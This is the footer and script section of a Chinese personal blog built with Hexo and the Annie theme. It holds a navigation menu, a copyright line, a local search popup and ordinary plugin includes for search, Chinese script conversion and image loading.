		<li class="menu-archive">
			<a href="/archives" class="menu-item-archive" target="_blank">归档</a>
		</li>
		
	
		<li class="menu-categories">
			<a href="/categories" class="menu-item-categories" target="_blank">分类</a>
		</li>
		
	
		<li class="menu-tags">
			<a href="/tags" class="menu-item-tags" target="_blank">标签</a>
		</li>
		
	
		<li class="menu-about">
			<a href="/about" class="menu-item-about" target="_blank">关于</a>
		</li>
		
	
		<li class="menu-gallery">
			<a href="/gallery" class="menu-item-gallery" target="_blank">相册</a>
		</li>
		
	

	
		<li class="menu-search">
			<a href="javascript:;" class="popup-trigger">搜索</a>
		</li>
	
</ul>
	</div>

	<div class="copyright">
		<p>
			 
				&copy;2024, content by ArcheriShade. All Rights Reserved.
			
			
				<a href="http://hexo.io/" title="Hexo" target="_blank" rel="noopener">Hexo</a> Theme <a href="https://github.com/Sariay/hexo-theme-Annie" title="Annie" target="_blank" rel="noopener">Annie</a> by Sariay.
			
		</p>
		<p>
			

	<!-- busuanzi -->
	<!-- busuanzi -->



			<a href="javascript:zh_tran('s');" class="zh_click" id="zh_click_s">简体</a> 
			<a href="javascript:zh_tran('t');" class="zh_click" id="zh_click_t">繁體</a>				
		</p>
	</div>		
</footer>
		
	<!-- Local or hitokoto! -->

	
<script src="/plugin/motto/motto.js"></script>

	
	<script type="text/javascript">
		(function motto(){
			let mottoText = getMingYanContent().split('</br> - </br>'),
			
			mottoTextContent = mottoText[0]?mottoText[0]:'请刷新...',
			
			mottoTextFrom = mottoText[1]?mottoText[1]:'one/一个';
			
			mottoTextContent = mottoTextContent.trim().substring(0, 100);
		
			$("#motto-content").html( mottoTextContent);
			$("#motto-author").html( mottoTextFrom  );
		})();	
	</script>	



<!-- love effect -->


<!-- back to top -->

	<div id="totop">
	<span class="icon-circle-up"></span>
</div>



<!-- site analysis -->


	<!-- site-analysis -->
	
	
	
	
	
 

<!-- leancloud -->


	<!-- leancloud -->
	<!--
	时间：2018-11-27
	描述：
		文章访问量：visitors
		文章喜欢量：likes	
		文章排行榜：topNPost
		其他得说明：
			01-Cookie相关的函数 
				https://blog.csdn.net/somehow1002/article/details/78511541（Author：somehow1002）
			02-visitors相关的函数 
				https://blog.csdn.net/u013553529/article/details/63357382（Author：爱博客大伯）
				https://notes.doublemine.me/2015-10-21-为NexT主题添加文章阅读量统计功能.html（Author：夏末）
			03-topNPost相关的函数
				https://hoxis.github.io/hexo-next-read-rank.html（Author：hoxis）
			04-likes相关的函数，
				参考了01 & 02进行简单的设计与实现
-->


	

  

	<!--
	时间：2018-10-3
	描述：
		插件名称：hexo-generator-search-zip
		插件来源: https://github.com/SuperKieran/hexo-generator-search-zip
		代码参考：https://github.com/SuperKieran/TKL/blob/master/layout/_partial/search.ejs(Include: js & css)	
-->
<div class="popup search-popup local-search-popup scrollbar" >
	<div class="local-search-container">
		<span class="popup-btn-close">
      		ESC
   		</span>
		<div class="local-search-header">
			<div class="input-prompt">				
			</div>
			<input autocomplete="off" placeholder="Search..." type="text" id="local-search-input">
		</div>
		<div class="local-search-body">
			<div id="local-search-output"></div>
		</div>
		<div class="local-search-footer">
			<div class="topN-post">				
				
								
			</div>
		</div>
	</div>
</div>


<script src="/plugin/search/ziploader.js"></script>
<script src="/js/search.js"></script>


<script type="text/javascript">
	var search_path = 'search.json',
		zip_Path = '/search.zip',
		version_Path = '/searchVersion.txt',
		input_Trigger = 'auto',
		top_N = '2';

	themeLocalSearch({
		search_path, 
		zip_Path, 
		version_Path, 
		input_Trigger, 
		top_N
	});
</script>



<script src="/plugin/chinese/chinese.js"></script>
<script src="/plugin/imagelazyloader/yall.min.js"></script>
<script src="/plugin/imageloaded/imagesloaded.pkgd.min.js"></script>
<script src="/plugin/nicescroll/jquery.nicescroll.js"></script>
<script src="/plugin/resizediv/resizediv.js"></script>
<script src="/js/main.js"></script>

	</body>	
</html>